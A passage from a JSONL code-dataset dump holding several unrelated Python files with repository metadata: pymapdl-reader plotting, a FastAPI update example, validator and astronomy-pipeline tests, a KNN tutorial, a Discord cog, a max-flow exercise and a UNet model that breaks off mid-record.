plotting\n# functions of ``pymapdl-reader``. 
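\n#\n# For instance (an illustrative call; the keyword arguments are stock pyvista\n# plotting options, not specific to this example):\n#\n#     rotor.plot(color=\"lightblue\", show_edges=True, background=\"w\")\n#\n# 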
See ``help(pyvista.plot`` for the\n# documentation on all the keyword arguments.\nrotor.plot_sectors(cpos=\"xy\", smooth_shading=True)\nrotor.plot()\n\n\n###############################################################################\n# Plot nodal displacement for result 21.\n#\n# Note that pymapdl-reader uses 0 based cumulative indexing. You could also\n# use the (load step, sub step) ``(4, 3)``.\nrotor.plot_nodal_displacement(\n 20, show_displacement=True, displacement_factor=0.001, overlay_wireframe=True\n) # same as (2, 4)\n\n\n###############################################################################\n# Animate Mode 21\n# ~~~~~~~~~~~~~~~\n# Disable movie_filename and increase n_frames for a smoother plot\nrotor.animate_nodal_solution(\n 20,\n loop=False,\n movie_filename=\"rotor_mode.gif\",\n background=\"w\",\n displacement_factor=0.001,\n add_text=False,\n n_frames=30,\n)\n","repo_name":"ansys/pymapdl-reader","sub_path":"examples/01-cyclic_results/sector_model.py","file_name":"sector_model.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"41774420445","text":"\"\"\"\n - PUT: to update an item you can use this\n - PATCH: to partially update data\n - If you want to receive partial updates, it's very useful to use the parameter exclude_unset in\n Pydantic's model's .dict().\n - Like item.dict(exclude_unset=True). That would generate a dict with only the data that was set when creating\n the item model, excluding default values.\n - Using Pydantic's update parameter. Now, you can create a copy of the existing model using .copy(), and pass the\n update parameter with a dict containing the data to update.\n - https://fastapi.tiangolo.com/tutorial/body-updates/\n\"\"\"\nimport uvicorn\nfrom fastapi import FastAPI\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\n\nclass Item(BaseModel):\n name: str | None = None\n description: str | None = None\n price: float | None = None\n tax: float = 10.5\n tags: list[str] = []\n\n\nitems = {\n \"foo\": {\"name\": \"Foo\", \"price\": 50.2},\n \"bar\": {\"name\": \"Bar\", \"description\": \"The bartenders\", \"price\": 62, \"tax\": 20.2},\n \"baz\": {\"name\": \"Baz\", \"description\": None, \"price\": 50.2, \"tax\": 10.5, \"tags\": []},\n}\n\n\n@app.get(\"/items/{item_id}\", response_model=Item)\nasync def read_item(item_id: str):\n return items[item_id]\n\n\n@app.put(\"/items/{item_id}\", response_model=Item)\nasync def update_item(item_id: str, item: Item):\n stored_item_data = items[item_id]\n stored_item_model = Item(**stored_item_data)\n update_data = item.dict(exclude_unset=True)\n updated_item = stored_item_model.copy(update=update_data)\n items[item_id] = jsonable_encoder(updated_item)\n return updated_item\n\nif __name__ == \"__main__\":\n uvicorn.run(\"__main__:app\", host=\"0.0.0.0\", port=8000, reload=True)\n","repo_name":"boringbyte/learn-fastapi","sub_path":"app/a_22_body_updates.py","file_name":"a_22_body_updates.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27885592771","text":"from tests.unit.dataactcore.factories.staging import FABSFactory\nfrom tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n\n_FILE = 'fabsreq9'\n\n\ndef test_column_headers(database):\n expected_subset = {'row_number', 'awardee_or_recipient_legal', 
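\n                       # (Aside on the FastAPI partial-update example above,\n                       # with illustrative values: item.dict(exclude_unset=True)\n                       # for a request body of {\"name\": \"Bar\"} yields only\n                       # {'name': 'Bar'}, so stored_item_model.copy(update=...)\n                       # leaves price and tax untouched.)\n                       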
'correction_delete_indicatr',\n                       'uniqueid_AssistanceTransactionUniqueKey'}\n    actual = set(query_columns(_FILE, database))\n    assert expected_subset == actual\n\n\ndef test_success(database):\n    \"\"\" Test AwardeeOrRecipientLegalEntityName is required for all submissions except delete records. \"\"\"\n\n    fabs = FABSFactory(correction_delete_indicatr='C', awardee_or_recipient_legal='REDACTED')\n    fabs_2 = FABSFactory(correction_delete_indicatr='', awardee_or_recipient_legal='Name')\n\n    # Test ignoring for D records\n    fabs_3 = FABSFactory(correction_delete_indicatr='d', awardee_or_recipient_legal=None)\n    fabs_4 = FABSFactory(correction_delete_indicatr='D', awardee_or_recipient_legal='')\n    fabs_5 = FABSFactory(correction_delete_indicatr='d', awardee_or_recipient_legal='Name')\n\n    errors = number_of_errors(_FILE, database, models=[fabs, fabs_2, fabs_3, fabs_4, fabs_5])\n    assert errors == 0\n\n\ndef test_failure(database):\n    \"\"\" Test fail AwardeeOrRecipientLegalEntityName is required for all submissions except delete records. \"\"\"\n\n    fabs = FABSFactory(correction_delete_indicatr='c', awardee_or_recipient_legal=None)\n    fabs_2 = FABSFactory(correction_delete_indicatr=None, awardee_or_recipient_legal='')\n\n    errors = number_of_errors(_FILE, database, models=[fabs, fabs_2])\n    assert errors == 2\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"tests/unit/dataactvalidator/test_fabsreq9.py","file_name":"test_fabsreq9.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"590539279","text":"#Cluster analysis is a technique or method for combining data points into groups or clusters based\n# on the numeric properties of the data points or the groups/clusters\n# \n# Clustering or Cluster analysis is one of the main data-driven methods for creating new knowledge\n# from data\n# \n# The concept of \"cluster\" is not defined\n# \n# Clusters are consequently defined by the algorithm that assigns a data point to a particular\n# cluster or creates clusters from a collection of data points.\n# \n# CA is unsupervised learning\n# Within machine learning and artificial intelligence, CA is one of the main methods to make\n# machines \"self-organize\", \"self-solve\" or \"create new knowledge\" from data\n# Within Data Science, Cluster Analysis is considered an explorative data analysis method\n# \n# Most cluster analysis algorithms are iterative algorithms\n# \n# Cluster Analysis solutions depend on the model, the data, data structures, administrative rules,\n# or the subjective will of the operator\n# \n# CA may be automated\n# \n# Algorithms may use \"rules of thumb\", \"trial and failure\", or \"requirements\" for particular desired \n# properties.\n# \n# Cluster analysts, be they human or machines, may have or not have prior opinions on cluster\n# structures or what clusters should be found\n# \n# These prior opinions may or may not be included in a CA\n# \n# Achieved results from a cluster analysis may sometimes be hard to explain w/o any subject \n# matter knowledge or need to be speculative - this is why cluster analysis is regarded as \n# explorative.\n# \n# CA has a large number of applications. 
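\n#\n# A minimal sketch of one such iterative method, k-means, in plain numpy\n# (illustrative only, not part of this script; assumes every cluster keeps at\n# least one member):\nimport numpy as np\n\ndef kmeans_sketch(points, k, n_iter=100, seed=0):\n    rng = np.random.default_rng(seed)\n    centers = points[rng.choice(len(points), size=k, replace=False)]\n    for _ in range(n_iter):\n        # assignment step: label each point with its nearest center\n        dists = np.linalg.norm(points[:, None, :] - centers[None, :, :], axis=2)\n        labels = dists.argmin(axis=1)\n        # update step: move each center to the mean of its members\n        new_centers = np.array([points[labels == j].mean(axis=0) for j in range(k)])\n        if np.allclose(new_centers, centers):\n            break\n        centers = new_centers\n    return labels, centers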
\n# \n# In CA the objective is not to predict a target class variable or to classify a data point\n# to a class (classification)\n# Neither is the objective to predict values for a variable y (prediction)\n# CA finds existing groupings or structures in the data as well as algorithmically defined\n# clusters among the data points.\n# CA can be used to create new classes for algorithms to classify new data. Similarly, new or\n# through cluster analysis defined cluster membership labels may be used to predict future\n# data values.#\n\n\n#K-NEAREST NEIGHBOUR CLASSIFIER\n# K-NN Classifier computes class membership for data points\n# \n# K-NN Classifier is not a cluster analysis algorithm but we'll take a look at this classifier\n# as the method is simple and easy to use to understand clusters and classes\n# \n# K-NN Classifier is an old and well-known algorithm that intuitively or \"artificially intelligently\"\n# classifies or places data points into classes or clusters based on the data points' closeness\n# and similarity to data points having a known class or cluster membership\n# \n# The K in the algorithm is the number of closest neighbouring data points to the measured\n# data point according to a distance measure.\n#     -K could be 1: the closest known data point determines class or the cluster membership\n#     for the tested data point.\n#     -K could be 2: the two closest known data points determine class or the cluster membership\n#     for the tested data point.\n#     -K could be 5: the five closest known data points determine class or the cluster membership\n#     for the tested data point.\n#     -K could be N, any number, and the N closest known data points determine class or cluster\n#     membership for the tested data point#\n\n#The K is dependent on the distance measurement and is also class/cluster dependent\n#     -this means that the K must be selected with consideration for distance measurements\n#     and the number of classes\n#     -for example 3 classes and a K of 3 may create some confusion in some datasets if the \n#     distance measurement is the lowest average distance and the three closest data points\n#     belong to different classes with the same distance from the considered data point#\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import datasets\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\niris = datasets.load_iris()\nDataF = pd.DataFrame(data=iris.data, columns=iris.feature_names)\nDataF[\"Species\"] = iris.target\nprint(DataF.head(5))\n\nsns.set_style(\"whitegrid\")\nPairplot_graph = sns.pairplot(DataF, kind=\"scatter\", hue=\"Species\", palette = \"bright\")\nplt.show()\n\n#This shows how the classifier works using the methodology with the \"train_test_split\" method\n#We start by selecting the four data columns as data X and the class membership column as Y.\nX = DataF.iloc[:, :-1].values\nY = DataF.iloc[:, 4].values\nX_train, X_test,Y_train, Y_test = train_test_split(X, Y, test_size=0.40)\n\n#We create our K-Nearest-Neighbor classifier with K set to five to begin\nclassifier = KNeighborsClassifier(n_neighbors=5)\nclassifier.fit(X_train, Y_train)\nY_pred = classifier.predict(X_test)\n\n#We print the confusion matrices and classification report to get a view on how well our K-nearest classifier works\nprint(confusion_matrix(Y_test, 
Y_pred))\nprint(classification_report(Y_test, Y_pred))\n\nX = DataF.iloc[:, :-1].values\nY = DataF.iloc[:, 4].values\nX_train, X_test,Y_train, Y_test = train_test_split(X, Y, test_size=0.40)\n\nAccuracy_data = pd.DataFrame(columns=['K', 'Trained_accuracy', 'Tested_accuracy'])\n\nfor k in range (1, 40):\n    classifier = KNeighborsClassifier(n_neighbors=k)\n    classifier.fit(X_train, Y_train)\n    Y_pred = classifier.predict(X_test)\n    Y_train_pred = classifier.predict(X_train)\n    Tr_accuracy = accuracy_score(Y_train, Y_train_pred)\n    Te_accuracy = accuracy_score(Y_test, Y_pred)\n    accuracy_values = pd.DataFrame.from_dict({'K': [k], 'Trained_accuracy': [Tr_accuracy], 'Tested_accuracy': [Te_accuracy]})\n    Accuracy_data = pd.concat([Accuracy_data, accuracy_values], ignore_index=True)\n\nprint(Accuracy_data.head(5))\n\nfig, ax = plt.subplots()\nsns.lineplot(x='K', y='Trained_accuracy', data=Accuracy_data, ax=ax, color='red')\nax2 = ax.twinx()\nsns.lineplot(x='K', y='Tested_accuracy', data=Accuracy_data, ax=ax2, color='blue')\nplt.show()\n\n","repo_name":"Ck178780/Training-Portfolio","sub_path":"ClusterAnalysis.py","file_name":"ClusterAnalysis.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31796147825","text":"import discord\nfrom discord.ext import commands\n\nclass Greetings(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        self._last_member = None\n\n    @commands.command(name='hello', aliases=['hi', 'yo'])\n    async def hello(self, ctx, *, member: discord.Member = None):\n        \"\"\"Says hello\"\"\"\n        member = member or ctx.author\n        if self._last_member is None or self._last_member.id != member.id:\n            await ctx.send('Hello {0.name}~'.format(member))\n        else:\n            await ctx.send('Hello {0.name}... 
This feels familiar.'.format(member))\n        self._last_member = member\n\n\ndef setup(bot):\n    bot.add_cog(Greetings(bot))","repo_name":"eternityyxb/Discord-Bot","sub_path":"cogs/maincog.py","file_name":"maincog.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067048428","text":"def main():\r\n    #input from the user(greeting)\r\n    greet = input(\"Greeting: \")\r\n\r\n    #prints the outcome and calls the start function\r\n    print(f\"${value(greet)}\")\r\n\r\ndef value(greeting):\r\n    #changed the lower and strip to be applied in the method because when a test is run, python\r\n    greeting = greeting.lower().strip()\r\n    if \"hello\" in greeting:\r\n        return 0\r\n    elif \"h\" in greeting[0]:\r\n        return 20\r\n    else:\r\n        return 100\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"Adamb0lt/CS50","sub_path":"CS50p/week5_unit_tests/test_bank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5285681418","text":"from zad3testy import runtests\nfrom zad3EK import edmonds_karp\n\n# I assume that the distance between p and q (computed as the sum of edge weights on the shortest path) is not smaller than d;\n# first I remove the edges that are longer than D,\n# then, by creating a super source and a super sink, I find the maximum flow, i.e. the number of edges I am asked for\n# in the problem statement\n# O(VE²) because of the Edmonds-Karp method\n#\n\ndef floyd_warshall(G):\n    n = len(G)\n\n    d = [[G[i][j] if G[i][j] > 0 else float('inf') for i in range(n)] for j in range(n)]\n\n    for k in range(n):\n        for i in range(n):\n            for j in range(n):\n                d[i][j] = min(d[i][j], d[i][k] + d[k][j])\n\n    return d\n\ndef BlueAndGreen(T, K, D):\n    n = len(T)\n\n    d = floyd_warshall(T)\n    for i in range(n):\n        for j in range(n):\n            if d[i][j] < D and T[i][j] > 0:\n                T[i][j] = T[j][i] = 0\n            elif d[i][j] >= D and T[i][j] == 0:\n                T[i][j] = T[j][i] = 1\n\n    G = [[0 for _ in range(n+2)]for __ in range(n+2)]\n    for i in range(n):\n        for j in range(n):\n            G[i][j] = n*T[i][j]\n\n    source = n\n    sink = n+1\n    for i in range(n):\n        if K[i] == 'B':\n            G[source][i] = G[i][source] = 1\n        else:\n            G[sink][i] = G[i][sink] = 1\n\n    result = edmonds_karp(G, source, sink)\n\n    return result\n\nruntests( BlueAndGreen )","repo_name":"krzychsol/Algorithms-and-Data-Structures","sub_path":"Colloquiums/K3_2021/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"778145257","text":"import unittest\nimport os\nimport tempfile\n\nimport lsst.geom\nimport lsst.utils\nimport lsst.pex.exceptions\nimport lsst.pex.config\n\nimport jointcalTestBase\n\n\n# for MemoryTestCase\ndef setup_module(module):\n    lsst.utils.tests.init()\n\n\nclass JointcalTestCFHT(jointcalTestBase.JointcalTestBase, lsst.utils.tests.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        try:\n            cls.data_dir = lsst.utils.getPackageDir('testdata_jointcal')\n        except LookupError:\n            raise unittest.SkipTest(\"testdata_jointcal not setup\")\n        try:\n            lsst.utils.getPackageDir('obs_cfht')\n        except LookupError:\n            raise unittest.SkipTest(\"obs_cfht not setup\")\n\n    def setUp(self):\n        input_dir = os.path.join(self.data_dir, 'cfht')\n        all_visits = [849375, 850587]\n\n        where = \"instrument='MegaPrime' and tract=0 and skymap='discrete'\"\n        inputCollections = [\"singleFrame\", 
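\n                            # (Aside on the max-flow reduction in zad3.py\n                            # above, illustrative: a new source s is tied to\n                            # every 'B' vertex and a new sink t to every 'G'\n                            # vertex with unit-capacity edges,\n                            #     G[source][i] = G[i][source] = 1   # i is 'B'\n                            #     G[sink][i] = G[i][sink] = 1       # otherwise\n                            # and edmonds_karp(G, source, sink) then returns\n                            # the requested edge count.)\n                            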
\"skymaps\"]\n refcats = {\"gaia_dr2_20200414\": os.path.join(input_dir, \"gaia_dr2_20200414.ecsv\"),\n \"ps1_pv3_3pi_20170110\": os.path.join(input_dir, \"ps1_pv3_3pi_20170110.ecsv\"),\n \"sdss_dr9_fink_v5b\": os.path.join(input_dir, \"sdss-dr9-fink-v5b.ecsv\")}\n\n outputDataId = {'instrument': 'MegaPrime', 'tract': 0, 'skymap': 'discrete'}\n self.setUp_base(\"lsst.obs.cfht.MegaPrime\", \"MegaPrime\",\n input_dir=input_dir,\n all_visits=all_visits,\n where=where,\n inputCollections=inputCollections,\n refcats=refcats,\n refcatPath=input_dir,\n outputDataId=outputDataId,\n log_level=\"DEBUG\")\n\n # The CFHT tests all produce the same set of output visits+detectors,\n # whether astrometry or photometry.\n self.outputVisits = {849375: (12, 13, 14, 21, 22, 23),\n 850587: (12, 13, 14, 21, 22, 23)}\n\n def test_jointcalTask_2_visits_simple(self):\n \"\"\"Test the simple models with two visits and check that some debug\n output files also get created.\n \"\"\"\n configOptions = {\"astrometryModel\": \"simple\", \"photometryModel\": \"simpleFlux\",\n \"writeInitialModel\": True, \"writeChi2FilesInitialFinal\": True}\n\n # use a temporary directory for debug output, to prevent test collisions\n with tempfile.TemporaryDirectory() as tempdir:\n configOptions[\"debugOutputPath\"] = tempdir\n metrics = {'astrometry_collected_refStars': 867,\n 'photometry_collected_refStars': 11569,\n 'astrometry_prepared_refStars': 323,\n 'photometry_prepared_refStars': 2302,\n 'astrometry_matched_fittedStars': 2399,\n 'photometry_matched_fittedStars': 2399,\n 'astrometry_prepared_fittedStars': 1255,\n 'photometry_prepared_fittedStars': 2317,\n 'astrometry_prepared_ccdImages': 12,\n 'photometry_prepared_ccdImages': 12,\n 'astrometry_final_chi2': 1568.76,\n 'astrometry_final_ndof': 2356,\n 'photometry_final_chi2': 11561.1,\n 'photometry_final_ndof': 2849\n }\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits, photometryOutputs=self.outputVisits)\n\n # Check for the existence of the chi2 contribution files.\n expected = ['photometry_initial_chi2-0_r.MP9601', 'astrometry_initial_chi2-0_r.MP9601',\n 'photometry_final_chi2-0_r.MP9601', 'astrometry_final_chi2-0_r.MP9601']\n for partial in expected:\n name = os.path.join(tempdir, partial+'-ref.csv')\n self.assertTrue(os.path.exists(name), msg=\"Did not find file %s\"%name)\n name = os.path.join(tempdir, partial+'-meas.csv')\n self.assertTrue(os.path.exists(name), msg='Did not find file %s'%name)\n\n expected = [\"initial_astrometry_model-0_r.MP9601.txt\", \"initial_photometry_model-0_r.MP9601.txt\"]\n for name in expected:\n fullpath = os.path.join(tempdir, name)\n self.assertTrue(os.path.exists(fullpath), msg=f\"Did not find file {fullpath}\")\n\n def setup_jointcalTask_2_visits_constrainedAstrometry(self):\n \"\"\"Set default values for the constrainedAstrometry tests, and make\n the differences between each test and the defaults more obvious.\n \"\"\"\n configOptions = {\"astrometryModel\": \"constrained\", \"doPhotometry\": False}\n metrics = {'astrometry_collected_refStars': 867,\n 'astrometry_prepared_refStars': 323,\n 'astrometry_matched_fittedStars': 2399,\n 'astrometry_prepared_fittedStars': 1255,\n 'astrometry_prepared_ccdImages': 12,\n 'astrometry_final_chi2': 1611.57,\n 'astrometry_final_ndof': 2428,\n }\n return configOptions, metrics\n\n def test_jointcalTask_2_visits_constrainedAstrometry_no_photometry(self):\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n 
configOptions['writeInitialModel'] = True # write the initial models\n # use a temporary directory for debug output, to prevent test collisions\n with tempfile.TemporaryDirectory() as tempdir:\n configOptions['debugOutputPath'] = tempdir\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n filename = os.path.join(tempdir, \"initial_astrometry_model-0_r.MP9601.txt\")\n self.assertTrue(os.path.exists(filename), msg=f\"Did not find file {filename}\")\n\n def test_jointcalTask_2_visits_constrainedAstrometry_no_rank_update(self):\n \"\"\"Demonstrate that skipping the rank update doesn't substantially affect astrometry.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n metrics['astrometry_final_chi2'] = 1611.57\n metrics['astrometry_final_ndof'] = 2318\n\n configOptions['astrometryDoRankUpdate'] = False\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_4sigma_outliers(self):\n \"\"\"4 sigma outlier rejection means fewer available sources after the\n fitter converges, resulting in a smaller ndof and chi2.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n configOptions['outlierRejectSigma'] = 4\n metrics['astrometry_final_chi2'] = 1173.75\n metrics['astrometry_final_ndof'] = 2254\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_astrometryOutlierRelativeTolerance(self):\n \"\"\"Test that astrometryOutlierRelativeTolerance changes the fit. Setting\n 1% for the astrometryOutlierRelativeTolerance will result in higher chi2\n and ndof.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n configOptions['astrometryOutlierRelativeTolerance'] = 0.01\n metrics['astrometry_final_chi2'] = 2229.21\n metrics['astrometry_final_ndof'] = 2552\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_astrometryReferenceUncertainty_smaller(self):\n \"\"\"Test with a smaller fake reference uncertainty: chi2 will be higher.\"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n astrometryRefErrConfig = os.path.join(self.path, 'config/astrometryReferenceErr-config.py')\n metrics['astrometry_final_chi2'] = 1479.02\n metrics['astrometry_final_ndof'] = 2524\n\n self._runJointcalTest(configFiles=[astrometryRefErrConfig],\n configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_astrometryReferenceUncertainty_None_fails(self):\n \"\"\"Setting astrometryReferenceUncertainty=None should fail for refcats\n that have no position errors.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n badRefErrConfig = os.path.join(self.path, 'config/astrometryReferenceErr-None-config.py')\n with self.assertRaisesRegex(lsst.pex.config.FieldValidationError,\n \"Reference catalog does not contain coordinate errors\"):\n self._runJointcalTest(configFiles=[badRefErrConfig], configOptions=configOptions, metrics=metrics)\n\n def setup_jointcalTask_2_visits_constrainedPhotometry(self):\n \"\"\"Set default values for the constrainedPhotometry tests, and 
make\n the differences between each test and the defaults more obvious.\n \"\"\"\n configOptions = {\"photometryModel\": \"constrainedFlux\", \"doAstrometry\": False}\n\n metrics = {'photometry_collected_refStars': 11569,\n 'photometry_prepared_refStars': 2302,\n 'photometry_matched_fittedStars': 2399,\n 'photometry_prepared_fittedStars': 2317,\n 'photometry_prepared_ccdImages': 12,\n 'photometry_final_chi2': 11264.28,\n 'photometry_final_ndof': 2821\n }\n return configOptions, metrics\n\n def test_jointcalTask_2_visits_constrainedPhotometry_no_astrometry(self):\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['writeInitialModel'] = True # write the initial models\n # use a temporary directory for debug output, to prevent test collisions\n with tempfile.TemporaryDirectory() as tempdir:\n configOptions['debugOutputPath'] = tempdir\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n filename = os.path.join(tempdir, \"initial_photometry_model-0_r.MP9601.txt\")\n self.assertTrue(os.path.exists(filename), msg=f\"Did not find file {filename}\")\n\n def test_jointcalTask_2_visits_constrainedPhotometry_no_rank_update(self):\n \"\"\"Demonstrate that skipping the rank update doesn't substantially affect photometry.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['photometryDoRankUpdate'] = False\n\n # The constrainedPhotometry model is not purely linear, so a small\n # change in final chi2 is possible.\n metrics['photometry_final_chi2'] = 10896.76\n metrics['photometry_final_ndof'] = 2787\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedPhotometry_lineSearch(self):\n \"\"\"Activating the line search should only slightly change the chi2.\n\n Activating line search for constrainedPhotometry should result in\n nearly the same final fit (the system is somewhat non-linear, so it\n may not be exactly the same: check the \"Line search scale factor\"\n lines in the DEBUG log for values that are not ~1 for proof).\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['allowLineSearch'] = True\n\n metrics['photometry_final_chi2'] = 10000.87\n metrics['photometry_final_ndof'] = 2773\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedMagnitude_no_astrometry(self):\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['photometryModel'] = \"constrainedMagnitude\"\n\n # The resulting fit should be close to the constrainedFlux model:\n # there are few CCDs and 2 visits, so there's not a lot of complexity\n # in this case to distinguish the flux vs. 
magnitude models.\n        metrics['photometry_final_chi2'] = 10276.57\n        metrics['photometry_final_ndof'] = 2823\n\n        self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n                              photometryOutputs=self.outputVisits)\n\n    def test_jointcalTask_2_visits_constrainedFlux_pedestal(self):\n        \"\"\"Test that forcing a systematic flux error results in a lower chi2.\n        \"\"\"\n        configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n        # median fluxErr/flux in ps1 is 0.11, so we have to make this bigger\n        # than that to actually allow more slop in the fit.\n        configOptions['photometryErrorPedestal'] = 0.2\n\n        # Final chi2 is much lower, because all sources contribute more error.\n        metrics['photometry_final_chi2'] = 3355.96\n        # ndof may change; slightly different likelihood contours, and fewer\n        # reference sources rejected.\n        metrics['photometry_final_ndof'] = 3262\n\n        self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n                              photometryOutputs=self.outputVisits)\n\n    def test_jointcalTask_2_visits_constrainedMagnitude_pedestal(self):\n        \"\"\"Test that forcing a systematic flux error results in a lower chi2.\n        \"\"\"\n        configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n        configOptions['photometryModel'] = \"constrainedMagnitude\"\n        # median fluxErr/flux in ps1 is 0.11, so we have to make this bigger\n        # than that to actually allow more slop in the fit.\n        configOptions['photometryErrorPedestal'] = 0.2\n\n        # Final chi2 is much lower, because all sources contribute more error.\n        metrics['photometry_final_chi2'] = 3165.87\n        # ndof may change; slightly different likelihood contours, and fewer\n        # reference sources rejected.\n        metrics['photometry_final_ndof'] = 3224\n\n        self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n                              photometryOutputs=self.outputVisits)\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n    pass\n\n\nif __name__ == \"__main__\":\n    lsst.utils.tests.init()\n    unittest.main()\n","repo_name":"lsst/jointcal","sub_path":"tests/test_jointcal_cfht.py","file_name":"test_jointcal_cfht.py","file_ext":"py","file_size_in_byte":15028,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"72166762027","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch import Tensor\n\nclass UNet(nn.Module):\n    def __init__(self, \n                encoders,\n                decoders,\n                bottlenecks=None,\n                res_paths = None,\n                print_shape=False,\n                device=\"cuda:0\"\n                ):\n        super().__init__()\n\n        self.device = device\n\n        ## Exception Check\n        if len(encoders) != len(decoders) :\n            raise Exception(\"ERROR::unmatched length : enc {} != dec {}\".format(len(encoders),len(decoders)))\n        else :\n            self.len_model = len(encoders)\n\n        self.print_shape = print_shape\n\n        self.encoders = encoders\n        self.decoders = decoders\n        for i in range(len(encoders)) : \n            module = self.encoders[i]\n            self.add_module(\"encoder_{}\".format(i),module)\n        for i in range(len(decoders)) : \n            module = self.decoders[i]\n            self.add_module(\"decoder_{}\".format(i),module)\n\n        # Residual Path\n        self.res_paths = []\n        if res_paths is not None :\n            if (len(res_paths) != self.len_model -1) :\n                raise Exception(\"ERROR::unmatched res_path : {} != {}\".format(len(res_paths),self.len_model-1))\n            else :\n                for i in range(len(res_paths)):\n                    module = res_paths[i]\n                    self.add_module(\"res_path{}\".format(i),module)\n                    self.res_paths.append(module)\n        # default : skip connection\n        else :\n            for i in range(self.len_model-1):\n                module = nn.Identity()\n                
self.add_module(\"res_path{}\".format(i),module)\n self.res_paths.append(module)\n # Dummy\n module = nn.Identity()\n self.add_module(\"res_path{}\".format(i+1),module)\n self.res_paths.append(module)\n \n ## Bottlenect\n self.bottlenecks = []\n if bottlenecks is not None :\n for i in range(len(bottlenecks)):\n module = bottlenecks[i]\n self.add_module(\"bottleneck{}\".format(i),module)\n self.bottlenecks.append(module)\n else :\n module = nn.Identity()\n self.add_module(\"bottleneck{}\".format(0),module)\n self.bottlenecks.append(module)\n\n bottleneck_channel = encoders[-1].conv.out_channels\n \n linear = nn.Conv2d(1, 1, 1)\n self.add_module(\"linear\", linear)\n self.activation_mask = nn.Sigmoid()\n \n def forward(self, x): \n # ipnut : [ Batch Channel Freq Time]\n\n # Time must be multiple of 16\n \"\"\"\n len_orig = x.shape[-1]\n need = int(16*np.floor(len_orig/16)+16) - len_orig\n x = torch.nn.functional.pad(x,(0,need))\n \"\"\"\n\n # Encoder \n x_skip = []\n for i, encoder in enumerate(self.encoders):\n x_skip.append(self.res_paths[i](x))\n x = encoder(x)\n if self.print_shape : \n print(\"Encoder {} : {}\".format(i,x.shape))\n\n p = x\n for i, bottleneck in enumerate(self.bottlenecks):\n p = bottleneck(p)\n if self.print_shape : \n print(\"bottleneck {} : {}\".format(i,p.shape))\n \n # Decoders\n for i, decoder in enumerate(self.decoders):\n p = decoder(p)\n if self.print_shape : \n print(\"Decoder {} : {}\".format(i,p.shape))\n # last layer of Decorders\n if i == self.len_model- 1:\n break\n p = torch.cat([p, x_skip[self.len_model - 1 - i]], dim=1)\n if self.print_shape : \n print(\"Decoder cat {} : 